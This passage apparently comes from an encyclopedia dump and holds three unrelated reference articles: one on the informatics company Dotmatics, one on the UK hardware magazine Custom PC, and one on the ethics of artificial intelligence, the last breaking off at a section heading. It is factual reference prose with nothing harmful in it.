Dotmatics is a scientific informatics company, focusing on data management, analysis and visualization. Founded in 2005, the company's central headquarters are in Bishops Stortford, Hertfordshire, England and has two US offices in San Diego, CA and Boston, MA. Dotmatics provides software to half of the world's 20 largest drugmakers. History Dotmatics' origins trace back to Merck Sharp and Dohme, a multinational pharmaceutical company, where, in the early 2000s, Merck staff developed what later became Dotmatics' browser and gateway software. Dotmatics Limited was founded in 2005 as a spin-out when Merck closed the site. The company was established with the intent to address the information needs of scientists in the biotech/pharma space. Nov. 2006: Incorporate Astex Therapeutics' chemical structure searching software as the product pinpoint. Oct. 2007: Headquarters moved to new premises in Bishops Stortford, United Kingdom. March 2009: Opened West Coast US office in Biotech Beach area of San Diego. Oct. 2009: Launched in Japanese market via Tokyo-based Infocom Corporation. April 2010: Opened East Coast US office in Boston Massachusetts. April 2010: Launched web-based Studies Notebook, for Windows, Mac, and Linux. Dec. 2010: Headquarters moved to expanded premises. March 2011, Studies Notebook integrated Lexichem chemical naming from OpenEye Scientific Software, to automate name-to-structure and structure-to-name conversions in English and foreign languages. April 2011: Elemental web-based structure drawing tool included in ChemSpider, the Royal Society of Chemistry's community website. Sept. 2011: Move East Coast office from Boston's financial district to Woburn MA. Oct 2017: Significant investment by Scottish Equity Partners June 2020: BioBright acquired diversifying into Laboratory Automation technology. July 2020: 2019 Revenue is over £26M Software and use Dotmatics develops web-based tools for querying, browsing, managing, and sharing scientific data and documents. Browser, a web-based tool for "chemically-aware" querying and browsing biological and chemical datasets, analysis of plate-based data, upload of data sets from Microsoft Excel; and registration. Vortex for visualizing and data-mining biological and chemical information. Vortex provides structure-based searching, together with physiochemical property calculations. Pinpoint, an Oracle-based tool for querying and integrating chemical databases. Gateway, a document management system and collaboration tool. Nucleus, a web-based tool for importing, mapping, and storing data from existing sources. Register, a web-based tool for single and batch chemical compound registration. Bioregister, for registering biological entities (protein and nucleotide sequences), as well as their clone vector, purification and expression information. Studies is a screening data management tool that allows creation, capture, analysis, and storage of chemical, biological, and ad hoc research data. Studies notebook, a Web-based Electronic lab notebook that supports chemistry, biology, and ad hoc research. It combines a web-based platform with intellectual property protection tools. Elemental, a web-based structure drawing tool for drawing simple chemical structures or complex structure queries directly within a webpage. Also available as an iOS app. Cascade, a Web-based workflow management tool that controls workflow among different departments using the Electronic lab notebook. 
Dotmatics for Office (D4O) makes Microsoft™ Office® applications such as Excel®, PowerPoint®, Word and Outlook® chemically aware. Chemselector manages very large chemistry datasets with fast search and trivially simple maintenance/update. It has a modern user interface focused on browsing and filtering for molecule, reagent and sample selection. The available eMolecules+ for Chemselector dataset provides access to highly curated eMolecules sourcing data. Inventory is a fully searchable sample and materials inventory that tracks chemicals, biologics, instruments and associated data across a hierarchy of locations and manages the dispensing and plating workflows, as samples are moved through an R&D process. Spaces allows project members within distributed research teams to collaborate using scientific teamboards that organize their research data and design ideas. Reaction Workflows, a graphical environment that enables scientists to build and execute data processing workflows to perform common cheminformatics tasks, such as library enumeration, structure normalization and compound profiling. The Informatics Suite is all the software packaged into one integrated suite. See also Cheminformatics Bioinformatics Business intelligence tools Electronic lab notebook Visual analytics Life Sciences Laboratory informatics References External links Staff listing - LinkedIn Cheminformatics
1971847
https://en.wikipedia.org/wiki/Custom%20PC%20%28magazine%29
Custom PC (magazine)
Custom PC (usually abbreviated to 'CPC') is a UK-based computer magazine created by Mr Freelance Limited, and originally published by Dennis Publishing Ltd. It is aimed at PC hardware enthusiasts, covering topics such as modding, overclocking, and PC gaming. The first issue was released in October 2003 and it is published monthly. Audited circulation figures are 9,428 (ABC, Jan–Dec 2014).
Gareth Ogden retired as editor of Custom PC at the end of Issue 52. Issue 53 was edited by Deputy Editor James Gorbold; from Issue 54 onwards the magazine was edited by Alex Watson. From Issue 87 to Issue 102 the magazine was edited by James Gorbold. From Issue 103 onward, the magazine has been edited by Ben Hardwidge.
Between 2009 and January 2012, the magazine was partnered with enthusiast site bit-tech.net, with the two editorial teams merging and sharing resources across both the site and the magazine. Custom PC's James Gorbold took over as Group Editor of the two teams. However, since February 2012, the two brands have separated and content is no longer shared between the two publications, although many of the magazine's writers continue to write for bit-tech. In February 2019 the magazine, along with Digital SLR Photography Magazine, was sold to Raspberry Pi Trading, a subsidiary of the Raspberry Pi Foundation.
Sections
The magazine includes reviews, features, tutorials, analysis columns and sections devoted to magazine readers. The most current regular sections include:
From the Editor – Introductory column by the editor Ben Hardwidge
Tracy King – Sceptical analysis of the ways in which technology and gaming are presented in the media
Richard Swinburne – Analysis of hardware trends in Taiwan
Hobby Tech – Tips, tricks and news about computer hobbyism, including Raspberry Pi, Arduino and retro computing, by Gareth Halfacree
Folding@Custom PC – Custom PC encourages readers to use their idle computers for the purpose of scientific research – Folding@home is a program created and run by Stanford University that uses spare processor cycles to simulate protein folding for disease research. Each month the magazine features a league table of their top folders; the 'Custom PC & bit-tech' team is currently ranked number 6 worldwide. One random folder receives an item of PC hardware each month (stopped in 2010), while the top folder that month is noted in the 'Folder of the month' section.
CPC Elite – A 10-page section of CPC's latest recommendations for the best hardware in several categories (motherboards, processors, cases etc.).
Reviews – CPC reviews the latest hardware and software (including games), rating products with its own rating system and giving its stamp of approval (including a Premium Grade award for excellent products) to any product that it feels excels in its particular category. While hardware reviews are the focus of the magazine, games reviews are included.
Custom Kit – 2 pages of short reviews of computer gadgets and accessories.
Lab Test – Each month CPC tests related hardware from different manufacturers / different specifications (such as graphics cards or hard drives), comparing them to discern the best choice. The tests include extensive benchmark comparison tables. Unlike most computer magazines, CPC doesn't do price-point labs tests; instead each item is awarded a value score that reflects whether the item is worth the asking price.
Games – Reviews of the latest games plus graphical comparison guides that show the difference made by different graphical settings.
Inverse Look – Opinion and analysis of PC gaming, by Rick Lane
Features – Several in-depth articles on computer-related topics (normally 2 per issue)
Customised PC – Two-page column dedicated to modding, water-cooling and PC customisation, by Antony Leather
How To – 5 pages of step-by-step tutorials written by Antony Leather.
Readers' Drives – Readers of the magazine get the chance to show off their computer modification skills. Each month a different reader is photographed with his rig and answers questions on its specification and how it was constructed. Featured modders win a prize pack of assorted computer hardware.
James Gorbold – The back page column is written by previous editor James Gorbold, who now works for Scan Computers.
Subscriber edition
Anyone who subscribes currently receives a free tool kit or another freebie, such as a custompc mug or recently (28 January 2011) a Muc-off Screen Cleaning Rescue Kit, targeted at computer maintenance. Subscribers receive a Special Subscriber Edition which features exclusive artwork (usually the "flat-out coolest" photo from the cover shoot, according to Alex Watson).
Editorial team
List of the editorial staff as of Issue 187 (April 2019).
Publishing Director: Russell Barnes
Editor: Ben Hardwidge
Modding Editor: Antony Leather
Games Editor: Rick Lane
Art Editor: Bill Bagnall
Production Editor: Julie Birrell
Regular Contributors: Edward Chester, Mike Jennings, James Gorbold, Gareth Halfacree, Phil Hartup, Tracy King, Richard Swinburne
Photography: Antony Leather, Gareth Halfacree, Henry Carter, Mike Jennings
Regular Art & Production Contributors: Magic Torch, Mike Harding
Printing / distribution
Printed by: BGP. Cover printed by: Ancient House. Distributed by: Seymour Distribution
See also
Maximum PC – American magazine with same focus
External links
Custom PC website
Custom PC RealBench 2015 Benchmark Suite
References
Home computer magazines
Computer magazines published in the United Kingdom
Video game magazines published in the United Kingdom
Monthly magazines published in the United Kingdom
Magazines established in 2003
2003 establishments in the United Kingdom
13659583
https://en.wikipedia.org/wiki/Ethics%20of%20artificial%20intelligence
Ethics of artificial intelligence
The ethics of artificial intelligence is the branch of the ethics of technology specific to artificially intelligent systems. It is sometimes divided into a concern with the moral behavior of humans as they design, make, use and treat artificially intelligent systems, and a concern with the behavior of machines, in machine ethics. It also includes the issue of a possible singularity due to superintelligent AI. Ethics fields' approaches Robot ethics The term "robot ethics" (sometimes "roboethics") refers to the morality of how humans design, construct, use and treat robots. Robot ethics intersect with the ethics of AI. Robots are physical machines whereas AI can be only software. Not all robots function through AI systems and not all AI systems are robots. Robot ethics considers how machines may be used to harm or benefit humans, their impact on individual autonomy, and their effects on social justice. Machine ethics Machine ethics (or machine morality) is the field of research concerned with designing Artificial Moral Agents (AMAs), robots or artificially intelligent computers that behave morally or as though moral. To account for the nature of these agents, it has been suggested to consider certain philosophical ideas, like the standard characterizations of agency, rational agency, moral agency, and artificial agency, which are related to the concept of AMAs. Isaac Asimov considered the issue in the 1950s in his I, Robot. At the insistence of his editor John W. Campbell Jr., he proposed the Three Laws of Robotics to govern artificially intelligent systems. Much of his work was then spent testing the boundaries of his three laws to see where they would break down, or where they would create paradoxical or unanticipated behavior. His work suggests that no set of fixed laws can sufficiently anticipate all possible circumstances. More recently, academics and many governments have challenged the idea that AI can itself be held accountable. A panel convened by the United Kingdom in 2010 revised Asimov's laws to clarify that AI is the responsibility either of its manufacturers, or of its owner/operator. In 2009, during an experiment at the Laboratory of Intelligent Systems in the Ecole Polytechnique Fédérale of Lausanne in Switzerland, robots that were programmed to cooperate with each other (in searching out a beneficial resource and avoiding a poisonous one) eventually learned to lie to each other in an attempt to hoard the beneficial resource. Some experts and academics have questioned the use of robots for military combat, especially when such robots are given some degree of autonomous functions. The US Navy has funded a report which indicates that as military robots become more complex, there should be greater attention to implications of their ability to make autonomous decisions. The President of the Association for the Advancement of Artificial Intelligence has commissioned a study to look at this issue. They point to programs like the Language Acquisition Device which can emulate human interaction. Vernor Vinge has suggested that a moment may come when some computers are smarter than humans. He calls this "the Singularity." He suggests that it may be somewhat or possibly very dangerous for humans. This is discussed by a philosophy called Singularitarianism. The Machine Intelligence Research Institute has suggested a need to build "Friendly AI", meaning that the advances which are already occurring with AI should also include an effort to make AI intrinsically friendly and humane. 
There are discussion on creating tests to see if an AI is capable of making ethical decisions. Alan Winfield concludes that the Turing test is flawed and the requirement for an AI to pass the test is too low. A proposed alternative test is one called the Ethical Turing Test, which would improve on the current test by having multiple judges decide if the AI's decision is ethical or unethical. In 2009, academics and technical experts attended a conference organized by the Association for the Advancement of Artificial Intelligence to discuss the potential impact of robots and computers and the impact of the hypothetical possibility that they could become self-sufficient and able to make their own decisions. They discussed the possibility and the extent to which computers and robots might be able to acquire any level of autonomy, and to what degree they could use such abilities to possibly pose any threat or hazard. They noted that some machines have acquired various forms of semi-autonomy, including being able to find power sources on their own and being able to independently choose targets to attack with weapons. They also noted that some computer viruses can evade elimination and have achieved "cockroach intelligence." They noted that self-awareness as depicted in science-fiction is probably unlikely, but that there were other potential hazards and pitfalls. However, there is one technology in particular that could truly bring the possibility of robots with moral competence to reality. In a paper on the acquisition of moral values by robots, Nayef Al-Rodhan mentions the case of neuromorphic chips, which aim to process information similarly to humans, nonlinearly and with millions of interconnected artificial neurons. Robots embedded with neuromorphic technology could learn and develop knowledge in a uniquely humanlike way. Inevitably, this raises the question of the environment in which such robots would learn about the world and whose morality they would inherit – or if they end up developing human 'weaknesses' as well: selfishness, a pro-survival attitude, hesitation etc. In Moral Machines: Teaching Robots Right from Wrong, Wendell Wallach and Colin Allen conclude that attempts to teach robots right from wrong will likely advance understanding of human ethics by motivating humans to address gaps in modern normative theory and by providing a platform for experimental investigation. As one example, it has introduced normative ethicists to the controversial issue of which specific learning algorithms to use in machines. Nick Bostrom and Eliezer Yudkowsky have argued for decision trees (such as ID3) over neural networks and genetic algorithms on the grounds that decision trees obey modern social norms of transparency and predictability (e.g. stare decisis), while Chris Santos-Lang argued in the opposite direction on the grounds that the norms of any age must be allowed to change and that natural failure to fully satisfy these particular norms has been essential in making humans less vulnerable to criminal "hackers". According to a 2019 report from the Center for the Governance of AI at the University of Oxford, 82% of Americans believe that robots and AI should be carefully managed. 
Concerns cited ranged from how AI is used in surveillance and in spreading fake content online (known as deep fakes when they include doctored video images and audio generated with help from AI) to cyberattacks, infringements on data privacy, hiring bias, autonomous vehicles, and drones that don't require a human controller. Ethics principles of artificial intelligence In the review of 84 ethics guidelines for AI 11 clusters of principles were found: transparency, justice and fairness, non-maleficence, responsibility, privacy, beneficence, freedom and autonomy, trust, sustainability, dignity, solidarity. Luciano Floridi and Josh Cowls created an ethical framework of AI principles set by four principles of bioethics (beneficence, non-maleficence, autonomy and justice) and an additional AI enabling principle – explicability. Transparency, accountability, and open source Bill Hibbard argues that because AI will have such a profound effect on humanity, AI developers are representatives of future humanity and thus have an ethical obligation to be transparent in their efforts. Ben Goertzel and David Hart created OpenCog as an open source framework for AI development. OpenAI is a non-profit AI research company created by Elon Musk, Sam Altman and others to develop open-source AI beneficial to humanity. There are numerous other open-source AI developments. Unfortunately, making code open source does not make it comprehensible, which by many definitions means that the AI code is not transparent. The IEEE has a standardisation effort on AI transparency. The IEEE effort identifies multiple scales of transparency for different users. Further, there is concern that releasing the full capacity of contemporary AI to some organizations may be a public bad, that is, do more damage than good. For example, Microsoft has expressed concern about allowing universal access to its face recognition software, even for those who can pay for it. Microsoft posted an extraordinary blog on this topic, asking for government regulation to help determine the right thing to do. Not only companies, but many other researchers and citizen advocates recommend government regulation as a means of ensuring transparency, and through it, human accountability. This strategy has proven controversial, as some worry that it will slow the rate of innovation. Others argue that regulation leads to systemic stability more able to support innovation in the long term. The OECD, UN, EU, and many countries are presently working on strategies for regulating AI, and finding appropriate legal frameworks. On June 26, 2019, the European Commission High-Level Expert Group on Artificial Intelligence (AI HLEG) published its “Policy and investment recommendations for trustworthy Artificial Intelligence”. This is the AI HLEG's second deliverable, after the April 2019 publication of the "Ethics Guidelines for Trustworthy AI". The June AI HLEG recommendations cover four principal subjects: humans and society at large, research and academia, the private sector, and the public sector. The European Commission claims that "HLEG's recommendations reflect an appreciation of both the opportunities for AI technologies to drive economic growth, prosperity and innovation, as well as the potential risks involved" and states that the EU aims to lead on the framing of policies governing AI internationally. Ethical challenges Biases in AI systems AI has become increasingly inherent in facial and voice recognition systems. 
Some of these systems have real business applications and directly impact people. These systems are vulnerable to biases and errors introduced by their human creators. Also, the data used to train these AI systems can itself have biases. For instance, facial recognition algorithms made by Microsoft, IBM and Face++ all had biases when it came to detecting people's gender; these AI systems were able to detect the gender of white men more accurately than the gender of darker-skinned men. Further, a 2020 study that reviewed voice recognition systems from Amazon, Apple, Google, IBM, and Microsoft found that they have higher error rates when transcribing black people's voices than white people's. Furthermore, Amazon terminated their use of AI hiring and recruitment because the algorithm favored male candidates over female ones. This was because Amazon's system was trained with data collected over a 10-year period that came mostly from male candidates.
Bias can creep into algorithms in many ways. For example, Friedman and Nissenbaum identify three categories of bias in computer systems: existing bias, technical bias, and emergent bias. In natural language processing, problems can arise from the text corpus, the source material the algorithm uses to learn about the relationships between different words.
Large companies such as IBM and Google have made efforts to research and address these biases. One solution for addressing bias is to create documentation for the data used to train AI systems. Process mining can be an important tool for organizations to achieve compliance with proposed AI regulations by identifying errors, monitoring processes, identifying potential root causes for improper execution, and other functions.
The problem of bias in machine learning is likely to become more significant as the technology spreads to critical areas like medicine and law, and as more people without a deep technical understanding are tasked with deploying it. Some experts warn that algorithmic bias is already pervasive in many industries and that almost no one is making an effort to identify or correct it. There are some open-source tools by civil societies that are looking to bring more awareness to biased AI.
Robot rights
"Robot rights" is the concept that people should have moral obligations towards their machines, akin to human rights or animal rights. It has been suggested that robot rights (such as a right to exist and perform its own mission) could be linked to robot duty to serve humanity, analogous to linking human rights with human duties before society. These could include the right to life and liberty, freedom of thought and expression, and equality before the law. The issue has been considered by the Institute for the Future and by the U.K. Department of Trade and Industry.
Experts disagree on how soon specific and detailed laws on the subject will be necessary. Glenn McGee reported that sufficiently humanoid robots might appear by 2020, while Ray Kurzweil sets the date at 2029. Another group of scientists meeting in 2007 supposed that at least 50 years had to pass before any sufficiently advanced system would exist.
The rules for the 2003 Loebner Prize competition envisioned the possibility of robots having rights of their own:
61. If in any given year, a publicly available open-source Entry entered by the University of Surrey or the Cambridge Center wins the Silver Medal or the Gold Medal, then the Medal and the Cash Award will be awarded to the body responsible for the development of that Entry.
If no such body can be identified, or if there is disagreement among two or more claimants, the Medal and the Cash Award will be held in trust until such time as the Entry may legally possess, either in the United States of America or in the venue of the contest, the Cash Award and Gold Medal in its own right. In October 2017, the android Sophia was granted "honorary" citizenship in Saudi Arabia, though some considered this to be more of a publicity stunt than a meaningful legal recognition. Some saw this gesture as openly denigrating of human rights and the rule of law. The philosophy of Sentientism grants degrees of moral consideration to all sentient beings, primarily humans and most non-human animals. If artificial or alien intelligence show evidence of being sentient, this philosophy holds that they should be shown compassion and granted rights. Joanna Bryson has argued that creating AI that requires rights is both avoidable, and would in itself be unethical, both as a burden to the AI agents and to human society. Threat to human dignity Joseph Weizenbaum argued in 1976 that AI technology should not be used to replace people in positions that require respect and care, such as: A customer service representative (AI technology is already used today for telephone-based interactive voice response systems) A nursemaid for the elderly (as was reported by Pamela McCorduck in her book The Fifth Generation) A soldier A judge A police officer A therapist (as was proposed by Kenneth Colby in the 70s) Weizenbaum explains that we require authentic feelings of empathy from people in these positions. If machines replace them, we will find ourselves alienated, devalued and frustrated, for the artificially intelligent system would not be able to simulate empathy. Artificial intelligence, if used in this way, represents a threat to human dignity. Weizenbaum argues that the fact that we are entertaining the possibility of machines in these positions suggests that we have experienced an "atrophy of the human spirit that comes from thinking of ourselves as computers." Pamela McCorduck counters that, speaking for women and minorities "I'd rather take my chances with an impartial computer," pointing out that there are conditions where we would prefer to have automated judges and police that have no personal agenda at all. However, Kaplan and Haenlein stress that AI systems are only as smart as the data used to train them since they are, in their essence, nothing more than fancy curve-fitting machines; Using AI to support a court ruling can be highly problematic if past rulings show bias toward certain groups since those biases get formalized and engrained, which makes them even more difficult to spot and fight against. Weizenbaum was also bothered that AI researchers (and some philosophers) were willing to view the human mind as nothing more than a computer program (a position now known as computationalism). To Weizenbaum, these points suggest that AI research devalues human life. AI founder John McCarthy objects to the moralizing tone of Weizenbaum's critique. "When moralizing is both vehement and vague, it invites authoritarian abuse," he writes. Bill Hibbard writes that "Human dignity requires that we strive to remove our ignorance of the nature of existence, and AI is necessary for that striving." Liability for self-driving cars As the widespread use of autonomous cars becomes increasingly imminent, new challenges raised by fully autonomous vehicles must be addressed. 
Recently, there has been debate as to the legal liability of the responsible party if these cars get into accidents. In one report where a driverless car hit a pedestrian, the driver was inside the car but the controls were fully in the hands of the computer. This led to a dilemma over who was at fault for the accident.
In another incident on March 18, 2018, Elaine Herzberg was struck and killed by a self-driving Uber in Arizona. In this case, the automated car was capable of detecting cars and certain obstacles in order to autonomously navigate the roadway, but it could not anticipate a pedestrian in the middle of the road. This raised the question of whether the driver, the pedestrian, the car company, or the government should be held responsible for her death.
Currently, self-driving cars are considered semi-autonomous, requiring the driver to pay attention and be prepared to take control if necessary. Thus, it falls on governments to regulate drivers who over-rely on autonomous features, as well as to educate them that these are technologies that, while convenient, are not a complete substitute. Before autonomous cars become widely used, these issues need to be tackled through new policies.
Weaponization of artificial intelligence
Some experts and academics have questioned the use of robots for military combat, especially when such robots are given some degree of autonomy. On October 31, 2019, the United States Department of Defense's Defense Innovation Board published the draft of a report recommending principles for the ethical use of artificial intelligence by the Department of Defense that would ensure a human operator would always be able to look into the 'black box' and understand the kill-chain process. However, a major concern is how the report will be implemented.
The US Navy has funded a report which indicates that as military robots become more complex, there should be greater attention to implications of their ability to make autonomous decisions. Some researchers state that autonomous robots might be more humane, as they could make decisions more effectively.
Within this last decade, there has been intensive research in autonomous power with the ability to learn using assigned moral responsibilities. "The results may be used when designing future military robots, to control unwanted tendencies to assign responsibility to the robots." From a consequentialist view, there is a chance that robots will develop the ability to make their own logical decisions on whom to kill, and that is why there should be a set moral framework that the AI cannot override.
There has been a recent outcry with regard to the engineering of artificial intelligence weapons that has included ideas of a robot takeover of mankind. AI weapons do present a type of danger different from that of human-controlled weapons. Many governments have begun to fund programs to develop AI weaponry. The United States Navy recently announced plans to develop autonomous drone weapons, paralleling similar announcements by Russia and Korea. Due to the potential of AI weapons becoming more dangerous than human-operated weapons, Stephen Hawking and Max Tegmark signed a "Future of Life" petition to ban AI weapons. The message posted by Hawking and Tegmark states that AI weapons pose an immediate danger and that action is required to avoid catastrophic disasters in the near future.
"If any major military power pushes ahead with the AI weapon development, a global arms race is virtually inevitable, and the endpoint of this technological trajectory is obvious: autonomous weapons will become the Kalashnikovs of tomorrow", says the petition, which includes Skype co-founder Jaan Tallinn and MIT professor of linguistics Noam Chomsky as additional supporters against AI weaponry. Physicist and Astronomer Royal Sir Martin Rees has warned of catastrophic instances like "dumb robots going rogue or a network that develops a mind of its own." Huw Price, a colleague of Rees at Cambridge, has voiced a similar warning that humans might not survive when intelligence "escapes the constraints of biology." These two professors created the Centre for the Study of Existential Risk at Cambridge University in the hope of avoiding this threat to human existence. Regarding the potential for smarter-than-human systems to be employed militarily, the Open Philanthropy Project writes that these scenarios "seem potentially as important as the risks related to loss of control", but research investigating AI's long-run social impact have spent relatively little time on this concern: "this class of scenarios has not been a major focus for the organizations that have been most active in this space, such as the Machine Intelligence Research Institute (MIRI) and the Future of Humanity Institute (FHI), and there seems to have been less analysis and debate regarding them". Opaque algorithms Approaches like machine learning with neural networks can result in computers making decisions that they and the humans who programmed them cannot explain. It is difficult for people to determine if such decisions are fair and trustworthy, leading potentially to bias in AI systems going undetected, or people rejecting the use of such systems. This has led to advocacy and in some jurisdictions legal requirements for explainable artificial intelligence. Singularity Many researchers have argued that, by way of an "intelligence explosion," a self-improving AI could become so powerful that humans would not be able to stop it from achieving its goals. In his paper "Ethical Issues in Advanced Artificial Intelligence" and subsequent book Superintelligence: Paths, Dangers, Strategies, philosopher Nick Bostrom argues that artificial intelligence has the capability to bring about human extinction. He claims that general superintelligence would be capable of independent initiative and of making its own plans, and may therefore be more appropriately thought of as an autonomous agent. Since artificial intellects need not share our human motivational tendencies, it would be up to the designers of the superintelligence to specify its original motivations. Because a superintelligent AI would be able to bring about almost any possible outcome and to thwart any attempt to prevent the implementation of its goals, many uncontrolled unintended consequences could arise. It could kill off all other agents, persuade them to change their behavior, or block their attempts at interference. However, instead of overwhelming the human race and leading to our destruction, Bostrom has also asserted that superintelligence can help us solve many difficult problems such as disease, poverty, and environmental destruction, and could help us to “enhance” ourselves. The sheer complexity of human value systems makes it very difficult to make AI's motivations human-friendly. 
Unless moral philosophy provides us with a flawless ethical theory, an AI's utility function could allow for many potentially harmful scenarios that conform with a given ethical framework but not "common sense". According to Eliezer Yudkowsky, there is little reason to suppose that an artificially designed mind would have such an adaptation. AI researchers such as Stuart J. Russell, Bill Hibbard, Roman Yampolskiy, Shannon Vallor, Steven Umbrello and Luciano Floridi have proposed design strategies for developing beneficial machines. Actors in AI ethics There are many organisations concerned with AI ethics and policy, public and governmental as well as corporate and societal. Amazon, Google, Facebook, IBM, and Microsoft have established a non-profit, The Partnership on AI to Benefit People and Society, to formulate best practices on artificial intelligence technologies, advance the public's understanding, and to serve as a platform about artificial intelligence. Apple joined in January 2017. The corporate members will make financial and research contributions to the group, while engaging with the scientific community to bring academics onto the board. The IEEE put together a Global Initiative on Ethics of Autonomous and Intelligent Systems which has been creating and revising guidelines with the help of public input, and accepts as members many professionals from within and without its organization. Traditionally, government has been used by societies to ensure ethics are observed through legislation and policing. There are now many efforts by national governments, as well as transnational government and non-government organizations to ensure AI is ethically applied. Intergovernmental initiatives The European Commission has a High-Level Expert Group on Artificial Intelligence. On 8 April 2019, this published its 'Ethics Guidelines for Trustworthy Artificial Intelligence'. The European Commission also has a Robotics and Artificial Intelligence Innovation and Excellence unit, which published a white paper on excellence and trust in artificial intelligence innovation on 19 February 2020. The OECD established an OECD AI Policy Observatory. Governmental initiatives In the United States the Obama administration put together a Roadmap for AI Policy. The Obama Administration released two prominent white papers on the future and impact of AI. In 2019 the White House through an executive memo known as the "American AI Initiative" instructed NIST the (National Institute of Standards and Technology) to begin work on Federal Engagement of AI Standards (February 2019). In January 2020, in the United States, the Trump Administration released a draft executive order issued by the Office of Management and Budget (OMB) on “Guidance for Regulation of Artificial Intelligence Applications" (“OMB AI Memorandum”). The order emphasizes the need to invest in AI applications, boost public trust in AI, reduce barriers for usage of AI, and keep American AI technology competitive in a global market. There is a nod to the need for privacy concerns, but no further detail on enforcement. The advances of American AI technology seems to be the focus and priority. Additionally, federal entities are even encouraged to use the order to circumnavigate any state laws and regulations that a market might see as too onerous to fulfill. 
The Computing Community Consortium (CCC) weighed in with a 100-plus page draft report, A 20-Year Community Roadmap for Artificial Intelligence Research in the US. The Center for Security and Emerging Technology advises US policymakers on the security implications of emerging technologies such as AI. The Non-Human Party is running for election in New South Wales, with policies around granting rights to robots, animals and, more generally, non-human entities whose intelligence has been overlooked.
Academic initiatives
There are three research institutes at the University of Oxford that are centrally focused on AI ethics. The Future of Humanity Institute focuses both on AI safety and on the governance of AI. The Institute for Ethics in AI, directed by John Tasioulas, has as one of its primary goals the promotion of AI ethics as a field in its own right alongside related applied ethics fields. The Oxford Internet Institute, directed by Luciano Floridi, focuses on the ethics of near-term AI technologies and ICTs. The AI Now Institute at NYU is a research institute studying the social implications of artificial intelligence. Its interdisciplinary research focuses on the themes of bias and inclusion, labour and automation, rights and liberties, and safety and civil infrastructure. The Institute for Ethics and Emerging Technologies (IEET) researches the effects of AI on unemployment and policy. The Institute for Ethics in Artificial Intelligence (IEAI) at the Technical University of Munich, directed by Christoph Lütge, conducts research across various domains such as mobility, employment, healthcare and sustainability.
Private organizations
Algorithmic Justice League
Black in AI
Data for Black Lives
Queer in AI
Role and impact of fiction
The role of fiction with regard to AI ethics has been a complex one. One can distinguish three levels at which fiction has impacted the development of artificial intelligence and robotics: historically, fiction has prefigured common tropes that have not only influenced goals and visions for AI but also outlined ethical questions and common fears associated with it. During the second half of the twentieth century and the first decades of the twenty-first century, popular culture, in particular movies, TV series and video games, has frequently echoed preoccupations and dystopian projections around ethical questions concerning AI and robotics. Recently, these themes have also been increasingly treated in literature beyond the realm of science fiction. And, as Carme Torras, research professor at the Institut de Robòtica i Informàtica Industrial (Institute of Robotics and Industrial Computing) at the Technical University of Catalonia, notes, in higher education science fiction is also increasingly used for teaching technology-related ethical issues in technological degrees.
History
Historically speaking, the investigation of the moral and ethical implications of "thinking machines" goes back at least to the Enlightenment: Leibniz already poses the question of whether we might attribute intelligence to a mechanism that behaves as if it were a sentient being, and so does Descartes, who describes what could be considered an early version of the Turing test. The romantic period several times envisioned artificial creatures that escape the control of their creator with dire consequences, most famously in Mary Shelley's Frankenstein.
The widespread preoccupation with industrialization and mechanization in the 19th and early 20th century, however, brought the ethical implications of unhinged technical developments to the forefront of fiction: R.U.R – Rossum's Universal Robots, Karel Čapek's play about sentient robots endowed with emotions and used as slave labor, is not only credited with the invention of the term 'robot' (derived from the Czech word for forced labor, robota) but was also an international success after it premiered in 1921. George Bernard Shaw's play Back to Methuselah, published in 1921, questions at one point the validity of thinking machines that act like humans; Fritz Lang's 1927 film Metropolis shows an android leading the uprising of the exploited masses against the oppressive regime of a technocratic society.
Impact on technological development
While the anticipation of a future dominated by potentially indomitable technology has fueled the imagination of writers and film makers for a long time, one question has been less frequently analyzed, namely, to what extent fiction has played a role in providing inspiration for technological development. It has been documented, for instance, that the young Alan Turing saw and appreciated G.B. Shaw's play Back to Methuselah in 1933 (just three years before the publication of his first seminal paper, which laid the groundwork for the digital computer), and he would likely have been at least aware of plays like R.U.R., which was an international success and translated into many languages. One might also ask which role science fiction played in establishing the tenets and ethical implications of AI development: Isaac Asimov conceptualized his Three Laws of Robotics in the 1942 short story "Runaround", part of the short story collection I, Robot; Arthur C. Clarke's short story "The Sentinel", on which Stanley Kubrick's film 2001: A Space Odyssey is based, was written in 1948 and published in 1952. Another example (among many others) would be Philip K. Dick's numerous short stories and novels – in particular Do Androids Dream of Electric Sheep?, published in 1968, which features its own version of a Turing test, the Voight-Kampff test, to gauge the emotional responses of androids indistinguishable from humans. The novel later became the basis of the influential 1982 movie Blade Runner by Ridley Scott. Science fiction has been grappling with the ethical implications of AI developments for decades, and has thus provided a blueprint for ethical issues that might emerge once something akin to general artificial intelligence has been achieved: Spike Jonze's 2013 film Her shows what can happen if a user falls in love with the seductive voice of his smartphone operating system; Ex Machina, on the other hand, asks a more difficult question: if confronted with a clearly recognizable machine, made human only by a face and an empathetic and sensual voice, would we still be able to establish an emotional connection, still be seduced by it? (The film echoes a theme already present two centuries earlier, in the 1817 short story "The Sandmann" by E.T.A. Hoffmann.) The theme of coexistence with artificial sentient beings is also the theme of two recent novels: Machines Like Me by Ian McEwan, published in 2019, involves (among many other things) a love triangle involving an artificial person as well as a human couple.
Klara and the Sun by Nobel Prize winner Kazuo Ishiguro, published in 2021, is the first-person account of Klara, an 'AF' (artificial friend), who is trying, in her own way, to help the girl she is living with, who, after having been 'lifted' (i.e. having been subjected to genetic enhancements), is suffering from a strange illness.
TV series
While ethical questions linked to AI have been featured in science fiction literature and feature films for decades, the emergence of the TV series as a genre allowing for longer and more complex story lines and character development has led to some significant contributions that deal with the ethical implications of technology. The Swedish series Real Humans (2012–2013) tackled the complex ethical and social consequences linked to the integration of artificial sentient beings in society. The British dystopian science fiction anthology series Black Mirror (2013–2019) was particularly notable for experimenting with dystopian fictional developments linked to a wide variety of recent technology developments. Both the French series Osmosis (2020) and the British series The One deal with the question of what can happen if technology tries to find the ideal partner for a person. Several episodes of the Netflix series Love, Death & Robots have imagined scenes of robots and humans living together; the most representative of these is the first episode of the second season, which shows how severe the consequences can be when robots get out of control and humans rely too much on them in their lives.
Future visions in fiction and games
